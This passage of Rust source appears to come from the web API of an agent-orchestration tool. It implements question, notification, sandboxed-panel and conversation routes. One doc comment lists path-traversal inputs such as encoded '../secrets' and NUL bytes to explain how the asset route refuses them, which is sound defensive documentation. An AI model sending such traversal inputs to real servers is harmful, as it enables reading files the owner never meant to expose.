3477    Ok(state)
3478}
3479
3480/// Runs on disk under `runs` whose state this build cannot parse - almost
3481/// always a schema bump, occasionally a run killed mid-write.
3482///
3483/// Exposed so every surface that reports on runs shares one count instead of
3484/// each re-deriving it: `/api/health` reports it as `runs_unreadable`, and
3485/// `magi doctor` calls this directly rather than guessing at the same number
3486/// a second way.
3487#[must_use]
3488pub fn runs_unreadable(runs: &FsPath) -> usize {
3489    run_ids(runs)
3490        .into_iter()
3491        .filter(|id| read_run(runs, id).is_err())
3492        .count()
3493}
3494
3495/// Expand an id or short id to exactly one run id.
3496fn resolve_run(runs: &FsPath, id: &str) -> ApiResult<String> {
3497    if runs.join(id).join("run.json").is_file() {
3498        return Ok(id.to_owned());
3499    }
3500    pick(run_ids(runs), id, "run")
3501}
3502
3503/// Expand an id or short id to exactly one task id.
3504fn resolve_task(queue: &Queue, id: &str) -> ApiResult<String> {
3505    if queue.path_of(id).is_file() {
3506        return Ok(id.to_owned());
3507    }
3508    pick(queue.list().into_iter().map(|t| t.id).collect(), id, "task")
3509}
3510
3511/// A question as the phone reads it.
3512///
3513/// `detail`, the reasoning an agent wrote, is markdown; `detail_md` is that
3514/// text already parsed into a node tree so the client never runs its own
3515/// markdown reader over agent-authored prose. A relative image path in it
3516/// resolves against this question's own panel asset route, which is the one
3517/// place [`md::ImageBase::QuestionPanel`] is used - the panel iframe is a
3518/// separate, sandboxed document, but `detail` is rendered inline in the
3519/// operator's own page, so an image reference in it may only ever point at
3520/// files magi itself already serves for this question.
3521#[derive(Debug, Serialize)]
3522struct QuestionView {
3523    #[serde(flatten)]
3524    question: Question,
3525    detail_md: Vec<md::Node>,
3526    /// Is the ball in the agent's court right now?
3527    ///
3528    /// [`QuestionStatus`] stays `Open` for the whole of a round trip - see
3529    /// [`Question::say`] - so this is the one field that tells the phone to
3530    /// disable the answer controls and show "waiting for the agent" instead of
3531    /// a card the owner can act on. Computed rather than stored on
3532    /// [`Question`] itself, on the same reasoning as `waiting` on
3533    /// [`RunSummary`]: it is a read of `thread`'s own last entry, and keeping
3534    /// it here means the client never has to re-derive that rule.
3535    waiting_on_agent: bool,
3536}
3537
3538impl From<Question> for QuestionView {
3539    fn from(question: Question) -> Self {
3540        let base = md::ImageBase::QuestionPanel {
3541            id: question.id.clone(),
3542        };
3543        Self {
3544            detail_md: md::to_nodes(&question.detail, &base),
3545            waiting_on_agent: question.waiting_on_agent(),
3546            question,
3547        }
3548    }
3549}
3550
3551/// `GET /api/questions`.
3552///
3553/// Everything, not just the open ones: an answered question is the record of a
3554/// decision, and the phone is where the operator goes back to check what they
3555/// told an agent at 3am. `ask::Questions::list` already ranks open first.
3556async fn questions_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<QuestionView>>> {
3557    blocking(move || {
3558        Ok(Json(
3559            ui.questions
3560                .list()
3561                .into_iter()
3562                .map(QuestionView::from)
3563                .collect(),
3564        ))
3565    })
3566    .await
3567}
3568
3569/// `GET /api/notifications`: not dismissed, newest first, with the unread
3570/// count so the badge and the list cannot disagree.
3571async fn notifications_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3572    blocking(move || {
3573        let items = ui.notices.list();
3574        let unread = items.iter().filter(|n| n.unread()).count();
3575        Ok(Json(
3576            serde_json::json!({ "unread": unread, "items": items }),
3577        ))
3578    })
3579    .await
3580}
3581
3582fn notice_error(e: anyhow::Error) -> ApiError {
3583    // An unknown or malformed id and a vanished file are the same answer to
3584    // the phone: that notification is gone.
3585    ApiError::not_found(format!("{e:#}"))
3586}
3587
3588/// `POST /api/notifications/{id}/read`.
3589async fn notification_read(
3590    State(ui): State<Arc<Ui>>,
3591    Path(id): Path<String>,
3592) -> ApiResult<Json<Notice>> {
3593    blocking(move || ui.notices.mark_read(&id).map(Json).map_err(notice_error)).await
3594}
3595
3596/// `POST /api/notifications/{id}/dismiss`.
3597async fn notification_dismiss(
3598    State(ui): State<Arc<Ui>>,
3599    Path(id): Path<String>,
3600) -> ApiResult<Json<Notice>> {
3601    blocking(move || ui.notices.dismiss(&id).map(Json).map_err(notice_error)).await
3602}
3603
3604/// `POST /api/notifications/read-all`.
3605async fn notifications_read_all(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3606    blocking(move || {
3607        let changed = ui.notices.mark_all_read()?;
3608        Ok(Json(serde_json::json!({ "marked": changed })))
3609    })
3610    .await
3611}
3612
3613/// The body of `POST /api/questions/{id}/answer`.
3614///
3615/// Exactly one of the two fields, mirroring `ask::Answer`. Both or neither is
3616/// a bad request rather than a guess: an answer magi invented is worse than a
3617/// question left open.
3618#[derive(Debug, Default, Deserialize)]
3619#[serde(default, deny_unknown_fields)]
3620struct NewAnswer {
3621    choice: Option<String>,
3622    text: Option<String>,
3623}
3624
3625async fn question_answer(
3626    State(ui): State<Arc<Ui>>,
3627    Path(id): Path<String>,
3628    body: std::result::Result<Json<NewAnswer>, axum::extract::rejection::JsonRejection>,
3629) -> ApiResult<Json<QuestionView>> {
3630    let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3631    let answer = match (body.choice, body.text) {
3632        (Some(c), None) => Answer::Choice(c),
3633        (None, Some(t)) => Answer::Text(t),
3634        (Some(_), Some(_)) => {
3635            return Err(ApiError::bad_request(
3636                "send either `choice` or `text`, not both",
3637            ));
3638        }
3639        (None, None) => {
3640            return Err(ApiError::bad_request("send a `choice` or a `text`"));
3641        }
3642    };
3643
3644    blocking(move || {
3645        let id = resolve_question(&ui.questions, &id)?;
3646        let mut q = ui
3647            .questions
3648            .get(&id)
3649            .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3650        if !q.status.open() {
3651            // Answered from the terminal, or by another phone, in between the
3652            // list and the tap. The UI shows the recorded answer rather than an
3653            // error, so it needs the record, not just the status.
3654            return Err(ApiError::conflict(format!(
3655                "question {} is already {}",
3656                q.short(),
3657                q.status.as_str()
3658            )));
3659        }
3660        // `Question::answer` owns the rules - an unoffered choice, free text on
3661        // a multiple-choice question, an empty reply - so the route does not
3662        // restate them and cannot drift from the CLI's behaviour.
3663        q.answer(answer).map_err(ApiError::bad_request_from)?;
3664        ui.questions.put(&mut q)?;
3665        Ok(Json(QuestionView::from(q)))
3666    })
3667    .await
3668}
3669
3670/// The body of `POST /api/questions/{id}/say`.
3671#[derive(Debug, Deserialize)]
3672#[serde(deny_unknown_fields)]
3673struct NewSay {
3674    body: String,
3675}
3676
3677/// `POST /api/questions/{id}/say` - the owner talks back without deciding.
3678///
3679/// Synchronous, unlike `POST /api/talks/{id}/say`: that route spawns an agent
3680/// CLI and waits on it, this one only appends a [`ask::Turn`] and writes the
3681/// file, so there is no turn to serialize against and no
3682/// [`Ui::begin_talk_turn`] guard to take. The agent waiting on this question
3683/// is a *different* process - the run parked behind `magi ask` - and picks
3684/// the reply up on its own poll of the very same file, same as an answer
3685/// does.
3686async fn question_say(
3687    State(ui): State<Arc<Ui>>,
3688    Path(id): Path<String>,
3689    body: std::result::Result<Json<NewSay>, JsonRejection>,
3690) -> ApiResult<Json<QuestionView>> {
3691    let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3692    blocking(move || {
3693        let id = resolve_question(&ui.questions, &id)?;
3694        let mut q = ui
3695            .questions
3696            .get(&id)
3697            .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3698        if !q.status.open() {
3699            // Same granularity as `question_answer`: answered or abandoned in
3700            // between the list and the tap is not this route's error to
3701            // explain any differently.
3702            return Err(ApiError::conflict(format!(
3703                "question {} is already {}",
3704                q.short(),
3705                q.status.as_str()
3706            )));
3707        }
3708        // `Question::say` owns the one rule that matters here - an empty
3709        // message tells the agent nothing - so the route does not restate it.
3710        q.say(body.body).map_err(ApiError::bad_request_from)?;
3711        ui.questions.put(&mut q)?;
3712        Ok(Json(QuestionView::from(q)))
3713    })
3714    .await
3715}
3716
3717/// Expand an id or short id to exactly one question id.
3718fn resolve_question(store: &Questions, id: &str) -> ApiResult<String> {
3719    if store.path_of(id).is_file() {
3720        return Ok(id.to_owned());
3721    }
3722    pick(
3723        store.list().into_iter().map(|q| q.id).collect(),
3724        id,
3725        "question",
3726    )
3727}
3728
3729/// `GET /api/questions/{id}/panel`.
3730///
3731/// The panel an agent wrote for this question, as `text/html` under
3732/// [`PANEL_CSP`], for the front end to mount in a token-less sandboxed iframe.
3733/// A question without one is a 404 rather than an empty page: the client
3734/// preflights this route with `HEAD` and must be able to tell "no panel" from
3735/// "a panel that rendered blank", and a sandboxed frame is opaque to the
3736/// parent document so it cannot tell the difference by looking.
3737///
3738/// The body is whatever the agent wrote, byte for byte. Nothing here rewrites,
3739/// sanitises or minifies it - a sanitiser is a list of things someone thought
3740/// of, and the sandbox plus the CSP is a list of things that are allowed, which
3741/// is the direction that stays safe when an agent writes markup nobody
3742/// predicted.
3743async fn question_panel(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Response> {
3744    blocking(move || {
3745        let id = resolve_question(&ui.questions, &id)?;
3746        let Some(html) = ui.questions.panel_html(&id) else {
3747            return Err(ApiError::not_found(format!("question {id} has no panel")));
3748        };
3749        Ok(panel_response(
3750            "text/html; charset=utf-8",
3751            false,
3752            html.into_bytes(),
3753        ))
3754    })
3755    .await
3756}
3757
3758/// `GET /api/questions/{id}/asset/{name}`.
3759///
3760/// One file from the question's own panel directory, so a panel can show a
3761/// diff as an SVG or a screenshot as a PNG without the CSP's `img-src 'self'`
3762/// having to allow anything off this machine.
3763///
3764/// This is the only route in the server where a client names a file, so it is
3765/// the only one with a traversal surface, and the name is checked by
3766/// [`ask::valid_asset_name`] before a path is built from it. Which layer stops
3767/// what is worth being explicit about, because the answer is not "all of it in
3768/// one place":
3769///
3770/// * `asset/../../secrets` never reaches this handler at all. axum matches on
3771///   the raw request path and `{name}` spans exactly one segment, so a real
3772///   slash makes the request too long for the route and the router answers 404.
3773/// * `asset/%2e%2e%2fsecrets` and `asset/..%5csecrets` do reach it: axum
3774///   percent-decodes path parameters, so `name` arrives as `../secrets` and
3775///   `..\secrets` respectively, which look like plain filenames to the router.
3776///   The validator refuses them here - both for the literal `..` and because
3777///   `/` and `\` are not in the permitted character set - and answers 400.
3778/// * A name carrying a NUL (`%00`) decodes to a string Rust is happy with but
3779///   the platform's path API is not, and it is refused here for the same
3780///   reason: NUL is not a permitted character.
3781/// * [`Questions::panel_asset`] validates again on read, so the check is not
3782///   load-bearing in only one place. This route's own check exists so the
3783///   failure is a 400 that says which name was wrong, rather than a store error
3784///   the operator has to interpret.
3785async fn question_asset(
3786    State(ui): State<Arc<Ui>>,
3787    Path((id, name)): Path<(String, String)>,
3788) -> ApiResult<Response> {
3789    // Before any filesystem work and before any path is built: a name this
3790    // server will not serve should not become a `PathBuf` at all.
3791    if !crate::ask::valid_asset_name(&name) {
3792        return Err(ApiError::bad_request(format!(
3793            "`{name}` is not a usable asset name"
3794        )));
3795    }
3796    blocking(move || {
3797        let id = resolve_question(&ui.questions, &id)?;
3798        let asset = ui
3799            .questions
3800            .panel_asset(&id, &name)
3801            .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
3802        let Some(bytes) = asset else {
3803            return Err(ApiError::not_found(format!(
3804                "question {id} has no asset `{name}`"
3805            )));
3806        };
3807        Ok(panel_response(
3808            asset_content_type(&name),
3809            is_svg(&name),
3810            bytes,
3811        ))
3812    })
3813    .await
3814}
3815
3816/// Content type for a panel asset, from a closed whitelist.
3817///
3818/// A whitelist with an `application/octet-stream` fallback rather than a
3819/// guess, because the one answer that must never come out of here is
3820/// `text/html`. An agent that writes `notes.html` into its panel directory and
3821/// links it would otherwise get its own markup rendered at the top level of the
3822/// operator's browser - outside the sandboxed frame, outside [`PANEL_CSP`], on
3823/// magi's origin - which is precisely the thing the panel design exists to
3824/// prevent. Same reasoning for `.js` and `.json`: unlisted means downloaded.
3825///
3826/// `nosniff` accompanies this on every response, so a browser cannot decide it
3827/// knows better than the type we sent.
3828fn asset_content_type(name: &str) -> &'static str {
3829    match extension(name).as_deref() {
3830        Some("png") => "image/png",
3831        Some("jpg" | "jpeg") => "image/jpeg",
3832        Some("gif") => "image/gif",
3833        Some("webp") => "image/webp",
3834        Some("svg") => "image/svg+xml",
3835        Some("css") => "text/css; charset=utf-8",
3836        Some("txt") => "text/plain; charset=utf-8",
3837        _ => "application/octet-stream",
3838    }
3839}
3840
3841/// Is this an SVG, and therefore a file that must never be opened at the top
3842/// level?
3843fn is_svg(name: &str) -> bool {
3844    extension(name).as_deref() == Some("svg")
3845}
3846
3847/// Lowercased extension, or `None` for a name without one.
3848fn extension(name: &str) -> Option<String> {
3849    name.rsplit_once('.')
3850        .map(|(_, ext)| ext.to_ascii_lowercase())
3851}
3852
3853/// Every panel response, with the four headers that make it safe and, for an
3854/// SVG, a fifth.
3855///
3856/// One function rather than a header list per handler, because a panel route
3857/// that forgets [`PANEL_CSP`] is not a cosmetic bug: it is the whole security
3858/// model gone, silently, on one of two routes. Adding a third panel route later
3859/// means calling this, and there is nowhere else to build a panel response.
3860///
3861/// `download` is set for SVG only. An SVG is XML that may carry `<script>`, and
3862/// as an `<img src>` inside the panel that script cannot run - but the asset
3863/// URL is also a plain URL an operator can be talked into opening in a tab,
3864/// where it is a document on magi's own origin. `Content-Disposition:
3865/// attachment` makes the browser download it instead of rendering it, which
3866/// closes that door without taking away the ability to draw a diff. Raster
3867/// images have no such execution surface and are left inline, so tapping a
3868/// screenshot still shows it.
3869fn panel_response(content_type: &'static str, download: bool, body: Vec<u8>) -> Response {
3870    let mut res = (
3871        [
3872            (header::CONTENT_TYPE, content_type),
3873            (header::CONTENT_SECURITY_POLICY, PANEL_CSP),
3874            (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
3875            (header::REFERRER_POLICY, "no-referrer"),
3876        ],
3877        body,
3878    )
3879        .into_response();
3880    if download {
3881        res.headers_mut().insert(
3882            header::CONTENT_DISPOSITION,
3883            HeaderValue::from_static("attachment"),
3884        );
3885    }
3886    res
3887}
3888
3889/// A talk as the phone reads it.
3890///
3891/// Every field of [`Talk`] verbatim, plus `turn_bodies_md` - one markdown node
3892/// tree per entry of `turns`, in order - parsed server-side so `app.js` never
3893/// parses markdown itself - and the process-local `thinking` hint.
3894#[derive(Debug, Serialize)]
3895struct TalkView {
3896    #[serde(flatten)]
3897    talk: Talk,
3898    turn_bodies_md: Vec<Vec<md::Node>>,
3899    /// Whether [`Ui::begin_talk_turn`] currently holds this talk's turn in
3900    /// this server process.
3901    ///
3902    /// This is deliberately not durable: another server process cannot see
3903    /// it, and a restarted server must not claim an old turn is live. It is a
3904    /// progress hint rather than proof a reply landed; the transcript remains
3905    /// the source of truth for that.
3906    thinking: bool,
3907}
3908
3909impl TalkView {
3910    fn new(talk: Talk, thinking: bool) -> Self {
3911        let turn_bodies_md = talk
3912            .turns
3913            .iter()
3914            .map(|turn| md::to_nodes(&turn.body, &md::ImageBase::None))
3915            .collect();
3916        Self {
3917            turn_bodies_md,
3918            thinking,
3919            talk,
3920        }
3921    }
3922}
3923
3924/// `GET /api/talks/{id}`'s answer: a [`TalkView`] plus the queue tasks this
3925/// conversation has filed, so the phone can follow one from inside the
3926/// conversation that asked for it rather than hunting the Queue for a task id
3927/// it may not remember.
3928#[derive(Debug, Serialize)]
3929struct TalkDetailView {
3930    #[serde(flatten)]
3931    view: TalkView,
3932    tasks: Vec<TaskView>,
3933}
3934
3935/// `GET /api/talks`.
3936///
3937/// Every conversation, open ones first and newest first - [`Talks::list`]'s
3938/// own order.
3939async fn talks_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TalkView>>> {
3940    blocking(move || {
3941        Ok(Json(
3942            ui.talks
3943                .list()
3944                .into_iter()
3945                .map(|talk| {
3946                    let thinking = ui.is_thinking(&talk.id);
3947                    TalkView::new(talk, thinking)
3948                })
3949                .collect(),
3950        ))
3951    })
3952    .await
3953}
3954
3955/// The body of `POST /api/talks`, all of it optional: opening a talk needs no
3956/// message. `repo` defaults to the server's own; `agent` to `[roles] chatter`,
3957/// [`talk::begin`]'s own default. Unknown fields are ignored so a newer front
3958/// end still opens a talk against an older binary.
3959#[derive(Debug, Default, Deserialize)]
3960#[serde(default)]
3961struct NewTalk {
3962    agent: Option<String>,
3963    repo: Option<PathBuf>,
3964}
3965
3966/// `POST /api/talks` - open a conversation. Takes no agent turn: see
3967/// [`talk::begin`]'s doc for why there is nothing yet for one to answer.
3968async fn talk_post(
3969    State(ui): State<Arc<Ui>>,
3970    body: std::result::Result<Json<NewTalk>, JsonRejection>,
3971) -> ApiResult<impl IntoResponse> {
3972    // An absent body, or an empty one, is the normal way to open a talk - see
3973    // `NewTalk`'s doc - so a missing content type is treated the same as `{}`
3974    // rather than refused.
3975    let body = match body {
3976        Ok(Json(body)) => body,
3977        Err(JsonRejection::MissingJsonContentType(_)) => NewTalk::default(),
3978        Err(e) => return Err(ApiError::bad_request(e.body_text())),
3979    };
3980    let repo = body.repo.clone().unwrap_or_else(|| ui.repo.clone());
3981    let cfg = config_for(&repo).await?;
3982    let view = blocking(move || {
3983        let talk = talk::begin(&ui.talks, &cfg, repo, body.agent.as_deref())?;
3984        let thinking = ui.is_thinking(&talk.id);
3985        Ok(TalkView::new(talk, thinking))
3986    })
3987    .await?;
3988    Ok((StatusCode::CREATED, Json(view)))
3989}
3990
3991/// `GET /api/talks/{id}`.
3992async fn talk_detail(
3993    State(ui): State<Arc<Ui>>,
3994    Path(id): Path<String>,
3995) -> ApiResult<Json<TalkDetailView>> {
3996    blocking(move || {
3997        let id = resolve_talk(&ui.talks, &id)?;
3998        let talk = ui.talks.get(&id)?;
3999        let thinking = ui.is_thinking(&talk.id);
4000        let tasks = talk::tasks_of(&ui.queue, &talk.id)
4001            .into_iter()
4002            .map(TaskView::from)
4003            .collect();
4004        Ok(Json(TalkDetailView {
4005            view: TalkView::new(talk, thinking),
4006            tasks,
4007        }))
4008    })
4009    .await
4010}
4011
4012/// The body of `POST /api/talks/{id}/say`.
4013///
4014/// `attachments` names ids `POST /api/talks/{id}/attachments` already
4015/// returned - never bytes of its own - so a turn with no images just omits
4016/// the field, which is what an older front end still does.
4017#[derive(Debug, Default, Deserialize)]
4018#[serde(default, deny_unknown_fields)]
4019struct NewTalkTurn {
4020    text: String,
4021    attachments: Vec<String>,
4022}
4023
4024#[derive(Debug, Deserialize)]
4025#[serde(deny_unknown_fields)]
4026struct EditTalkPending {
4027    text: String,
4028    expected_text: String,
4029    expected_attachments: Vec<String>,
4030}
4031
4032#[derive(Debug, Deserialize)]
4033#[serde(deny_unknown_fields)]
4034struct ClearTalkPending {
4035    expected_text: String,
4036    expected_attachments: Vec<String>,
4037}
4038
4039/// `POST /api/talks/{id}/say` - one turn of the conversation.
4040///
4041/// Not filesystem work, and therefore not routed through [`blocking`]: this
4042/// route spawns an agent CLI and a turn here can run for the whole of
4043/// [`crate::config::Graph::timeout_talk`] - an hour by default - because a
4044/// research turn is expected to run commands rather than answer from what it
4045/// already knows. Holding an HTTP connection open that long is not a thing
4046/// to ask a phone to do; the operator's message is recorded and answered for
4047/// immediately, and the reply lands in the background, discovered through
4048/// the change stream's `talks_rev` the same way every other update on this
4049/// surface is.
4050async fn talk_say(
4051    State(ui): State<Arc<Ui>>,
4052    Path(id): Path<String>,
4053    body: std::result::Result<Json<NewTalkTurn>, JsonRejection>,
4054) -> ApiResult<(StatusCode, Json<TalkView>)> {
4055    let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4056    if body.text.trim().is_empty() && body.attachments.is_empty() {
4057        return Err(ApiError::bad_request("say something"));
4058    }
4059
4060    let id = {
4061        let ui = Arc::clone(&ui);
4062        let asked = id.clone();
4063        blocking(move || resolve_talk(&ui.talks, &asked)).await?
4064    };
4065    // A closed Talk never accepts a new immediate or queued turn. Check this
4066    // before claiming a slot so its ordinary domain refusal is a 409, not an
4067    // incidental failure from the later record/queue write.
4068    {
4069        let ui = Arc::clone(&ui);
4070        let id = id.clone();
4071        blocking(move || {
4072            let talk = ui.talks.get(&id)?;
4073            if !talk.status.open() {
4074                return Err(ApiError::conflict(format!(
4075                    "talk {} is {} and takes no more turns",
4076                    talk.short(),
4077                    talk.status.as_str()
4078                )));
4079            }
4080            Ok(())
4081        })
4082        .await?;
4083    }
4084
4085    // Every attachment id resolved to the metadata `talk::record`/`talk::queue`
4086    // actually stores, before anything is written - an unknown id is a 4xx
4087    // that names it rather than a turn (or a queued draft) silently missing
4088    // an image.
4089    let attachments = {
4090        let ui = Arc::clone(&ui);
4091        let id = id.clone();
4092        let ids = body.attachments.clone();
4093        blocking(move || {
4094            ids.into_iter()
4095                .map(|att_id| {
4096                    ui.talks.attachment_meta(&id, &att_id)?.ok_or_else(|| {
4097                        ApiError::bad_request(format!("unknown attachment `{att_id}`"))
4098                    })
4099                })
4100                .collect::<ApiResult<Vec<talk::Attachment>>>()
4101        })
4102        .await?
4103    };
4104
4105    // Pending recovery and a new immediate turn are decided under the same
4106    // claim lock. Without that one critical section, a second `/say` can see
4107    // the first request's claim as "busy" and append itself to the recovered
4108    // draft before the first request rejects it.
4109    let start = {
4110        let ui = Arc::clone(&ui);
4111        let id = id.clone();
4112        blocking(move || ui.begin_talk_turn_unless_pending(&id)).await?
4113    };
4114    let turn_guard = match start {
4115        TalkTurnStart::Claimed(turn_guard) => turn_guard,
4116        TalkTurnStart::Pending => {
4117            return Err(ApiError::conflict(
4118                "a queued draft is waiting; resume it, edit it, or clear it before sending another message",
4119            ));
4120        }
4121        TalkTurnStart::Busy => {
4122            // A turn is already running: queue rather than refuse. See
4123            // `Ui::begin_talk_turn` and `talk::queue`.
4124            //
4125            // The queue write and the drain it may owe live inside the task
4126            // `tokio::spawn` hands to the runtime, for the same reason the
4127            // immediate path below puts `record` there: a dropped handler
4128            // future must not be able to land between a durable write and
4129            // the task that answers it. `blocking` runs its closure on
4130            // `spawn_blocking`, which finishes whether or not anyone is left
4131            // to receive its result - so a disconnect at the `.await` below
4132            // would otherwise leave the draft persisted and the reclaimed
4133            // `TalkTurnGuard` dropped on the floor, with no `drain_loop`
4134            // ever started and the queued text stranded until some later
4135            // `say` happened to pick it up. The caller's 202 travels back
4136            // over a `oneshot`, sent the moment the write lands.
4137            let (tx, rx) = tokio::sync::oneshot::channel();
4138            tokio::spawn({
4139                let ui = Arc::clone(&ui);
4140                let id = id.clone();
4141                let said = body.text.clone();
4142                async move {
4143                    let written = blocking({
4144                        let ui = Arc::clone(&ui);
4145                        let id = id.clone();
4146                        move || {
4147                            let mut talk = ui.talks.get(&id)?;
4148                            // A test-only stop point, right before the write
4149                            // an interleaving test needs to pin - see
4150                            // `BusyQueueGate`. `None` in every real server:
4151                            // the field only exists under `#[cfg(test)]`.
4152                            #[cfg(test)]
4153                            if let Some(gate) = ui
4154                                .busy_queue_gate
4155                                .lock()
4156                                .unwrap_or_else(PoisonError::into_inner)
4157                                .take()
4158                            {
4159                                let _ = gate.reached.send(());
4160                                let _ = gate.release.recv();
4161                            }
4162                            if let Err(error) =
4163                                talk::queue(&mut talk, &ui.talks, &said, attachments)
4164                            {
4165                                if let Ok(fresh) = ui.talks.get(&id) {
4166                                    if !fresh.status.open() {
4167                                        return Err(ApiError::conflict(format!(
4168                                            "talk {} is {} and takes no more turns",
4169                                            fresh.short(),
4170                                            fresh.status.as_str()
4171                                        )));
4172                                    }
4173                                }
4174                                return Err(ApiError::from(error));
4175                            }
4176                            // The turn that looked busy a moment ago can have
4177                            // finished, found nothing to drain and given up the
4178                            // slot in the gap between that check and this write
4179                            // landing - see `drain_loop`'s own doc for the other
4180                            // half of why that gap would otherwise be able to
4181                            // open at all. Reclaiming the slot here, rather than
4182                            // trusting that whoever held it is still watching, is
4183                            // what stops the text just queued from being stranded
4184                            // until an unrelated future `say` happens to drain
4185                            // it.
4186                            let claim = match ui.begin_queued_talk_turn(&id)? {
4187                                Some(turn_guard) => {
4188                                    let (cfg, _) = Config::discover(&talk.repo, None)?;
4189                                    Some((talk.clone(), cfg, turn_guard))
4190                                }
4191                                None => None,
4192                            };
4193                            let thinking = ui.is_thinking(&id);
4194                            Ok((TalkView::new(talk, thinking), claim))
4195                        }
4196                    })
4197                    .await;
4198                    let (view, reclaimed) = match written {
4199                        Ok(pair) => pair,
4200                        Err(e) => {
4201                            // Nobody is listening if the handler's own future
4202                            // was already dropped - that is fine, nothing was
4203                            // persisted and there is no response left to carry
4204                            // this error to.
4205                            let _ = tx.send(Err(e));
4206                            return;
4207                        }
4208                    };
4209                    // If this fails, the caller is gone; the drain below still
4210                    // runs exactly as it would have for a caller that stayed.
4211                    let _ = tx.send(Ok(view));
4212                    if let Some((talk, cfg, turn_guard)) = reclaimed {
4213                        let talks = ui.talks.clone();
4214                        drain_loop(talk, talks, cfg, id, turn_guard).await;
4215                    }
4216                }
4217            });
4218            let view = rx
4219                .await
4220                .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
4221            return Ok((StatusCode::ACCEPTED, Json(view)));
4222        }
4223    };
4224
4225    let (talk, cfg) = {
4226        let ui = Arc::clone(&ui);
4227        let id = id.clone();
4228        blocking(move || {
4229            let talk = ui.talks.get(&id)?;
4230            let (cfg, _) = Config::discover(&talk.repo, None)?;
4231            Ok((talk, cfg))
4232        })
4233        .await?
4234    };
4235
4236    let talks = ui.talks.clone();
4237    // `record` runs *inside* the spawned task, rather than in this handler
4238    // followed by a separate `tokio::spawn` for `respond` - axum drops this
4239    // whole handler future outright on disconnect (see `TalkTurnGuard`'s
4240    // doc), and that drop can land at any `.await` this function makes,
4241    // including one that has already produced its result but not yet
4242    // resumed. A message could end up recorded on disk with the handler
4243    // future gone before it ever reached the `tokio::spawn` that would have
4244    // started the reply. `tokio::spawn` itself is a plain, synchronous call
4245    // that hands the whole future to the runtime as one unit - once made, no
4246    // later drop of *this* handler's own future (that call's return value is
4247    // never held onto here) can reach back in and stop it, so record and the
4248    // hand-off to `respond` are unconditionally atomic from the client's
4249    // point of view. The immediate response this handler owes the caller
4250    // travels back over a `oneshot`, sent the moment `record` succeeds.
4251    let (tx, rx) = tokio::sync::oneshot::channel();
4252    tokio::spawn({
4253        let ui = Arc::clone(&ui);
4254        let talks = talks.clone();
4255        let id = id.clone();
4256        let said = body.text.clone();
4257        let mut talk = talk.clone();
4258        async move {
4259            let recorded = blocking({
4260                let talks = talks.clone();
4261                move || {
4262                    if let Err(error) = talk::record(&mut talk, &talks, &said, attachments) {
4263                        if let Ok(fresh) = talks.get(&talk.id) {
4264                            if !fresh.status.open() {
4265                                return Err(ApiError::conflict(format!(
4266                                    "talk {} is {} and takes no more turns",
4267                                    fresh.short(),
4268                                    fresh.status.as_str()
4269                                )));
4270                            }
4271                        }
4272                        return Err(ApiError::from(error));
4273                    }
4274                    // `record` mutates `talk` in place to the freshly persisted
4275                    // state (status, pending, and the just-appended operator
4276                    // turn), so returning it here is equivalent to re-reading it
4277                    // from disk - without the extra round trip a re-read would
4278                    // need.
4279                    Ok((said.trim().to_owned(), talk))
4280                }
4281            })
4282            .await;
4283            let (text, mut talk) = match recorded {
4284                Ok(pair) => pair,
4285                Err(e) => {
4286                    // Nobody is listening if the handler's own future was
4287                    // already dropped - that is fine, there is no response
4288                    // left to carry this error to and nothing was persisted.
4289                    let _ = tx.send(Err(e));
4290                    return;
4291                }
4292            };
4293            let queued = talk.clone();
4294            let thinking = ui.is_thinking(&id);
4295            // If this fails, the caller is gone; the turn still runs below
4296            // exactly as it would have for a caller that stayed connected.
4297            let _ = tx.send(Ok((queued, thinking)));
4298
4299            if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &text).await {
4300                // `respond` records the failure in the transcript itself,
4301                // which is what the phone reads; this line is for the
4302                // operator's terminal.
4303                tracing::warn!("talk {id} turn failed: {e:#}");
4304            }
4305            // Anything `talk::queue` added while the turn above was running
4306            // is still owed an answer - see `drain_loop`.
4307            drain_loop(talk, talks, cfg, id, turn_guard).await;
4308        }
4309    });
4310
4311    let (queued, thinking) = rx
4312        .await
4313        .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
4314
4315    // 202: the operator's message is recorded and a turn is running.
4316    Ok((StatusCode::ACCEPTED, Json(TalkView::new(queued, thinking))))
4317}
4318
4319/// `POST /api/talks/{id}/pending/resume` promotes a persisted draft without
4320/// changing it. The turn guard is the same per-talk ownership `talk_say`
4321/// holds, so duplicate recovery clicks cannot resume the CLI session twice.
4322async fn talk_pending_resume(
4323    State(ui): State<Arc<Ui>>,
4324    Path(id): Path<String>,
4325) -> ApiResult<(StatusCode, Json<TalkView>)> {
4326    let id = {
4327        let ui = Arc::clone(&ui);
4328        let asked = id.clone();
4329        blocking(move || resolve_talk(&ui.talks, &asked)).await?
4330    };
4331    let Some(turn_guard) = ui.begin_talk_turn(&id)? else {
4332        return Err(ApiError::conflict(
4333            "a talk turn is already running; the queued draft will be handled by it",
4334        ));
4335    };
4336    let (talk, cfg) = {
4337        let ui = Arc::clone(&ui);
4338        let id = id.clone();
4339        blocking(move || {
4340            let talk = ui.talks.get(&id)?;
4341            if !talk.status.open() {
4342                return Err(ApiError::conflict(format!(
4343                    "talk {} is {} and takes no more turns",
4344                    talk.short(),
4345                    talk.status.as_str()
4346                )));
4347            }
4348            if talk.pending.is_empty() && talk.pending_attachments.is_empty() {
4349                return Err(ApiError::conflict("there is no queued draft to resume"));
4350            }
4351            let (cfg, _) = Config::discover(&talk.repo, None)?;
4352            Ok((talk, cfg))
4353        })
4354        .await?
4355    };
4356    let view = TalkView::new(talk.clone(), true);
4357    let talks = ui.talks.clone();
